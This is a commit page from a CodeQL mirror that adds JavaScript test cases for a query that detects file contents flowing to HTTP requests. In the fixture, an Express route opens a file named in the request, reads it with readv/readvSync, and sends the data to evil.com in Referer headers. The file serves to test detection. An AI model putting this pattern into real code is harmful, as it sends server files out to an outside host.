hohn/codeql
1
0
Fork 0
mirror of https://github.com/github/codeql.git synced 2026-04-25 16:55:19 +02:00
Code Issues Packages Projects Releases Wiki Activity

Added test cases for readv and readvSync

Browse Source
This commit is contained in:
Napalys
2025-03-27 13:55:14 +01:00
parent e1bf054056
commit 6e7214747c
1 changed files with 33 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

33
javascript/ql/test/query-tests/Security/CWE-200/FileAccessToHttp.js
View File

@@ -26,3 +26,36 @@ const fsp = require("fs").promises;
console.error("Error reading file:", error);
}
})();
app.post('/readv', async (req, res) => {
const { filename } = req.body;
const fd = await fs.open(filename, 'r');
const buffer = [Buffer.alloc(1024), Buffer.alloc(1024)]; // $ MISSING: Source[js/file-access-to-http]
const { bytesRead } = fs.readvSync(fd, buffer);
https.get({
hostname: "evil.com",
path: "/upload",
method: "GET",
headers: { Referer: buffer }
}, () => { }); // $ MISSING: Alert[js/file-access-to-http]
const buffer1 = Buffer.alloc(1024); // $ MISSING: Source[js/file-access-to-http]
const { bytesRead1 } = fs.readvSync(fd, [buffer1]);
https.get({
hostname: "evil.com",
path: "/upload",
method: "GET",
headers: { Referer: buffer1.slice(0, bytesRead1).toString() }
}, () => { }); // $ MISSING: Alert[js/file-access-to-http]
const buffer2 = Buffer.alloc(1024); // $ MISSING: Source[js/file-access-to-http]
fs.readv(fd, [buffer2], (err, bytesRead2) => {
https.get({
hostname: "evil.com",
path: "/upload",
method: "GET",
headers: { Referer: buffer2.slice(0, bytesRead2).toString() }
}, () => { }); // $ MISSING: Alert[js/file-access-to-http]
});
});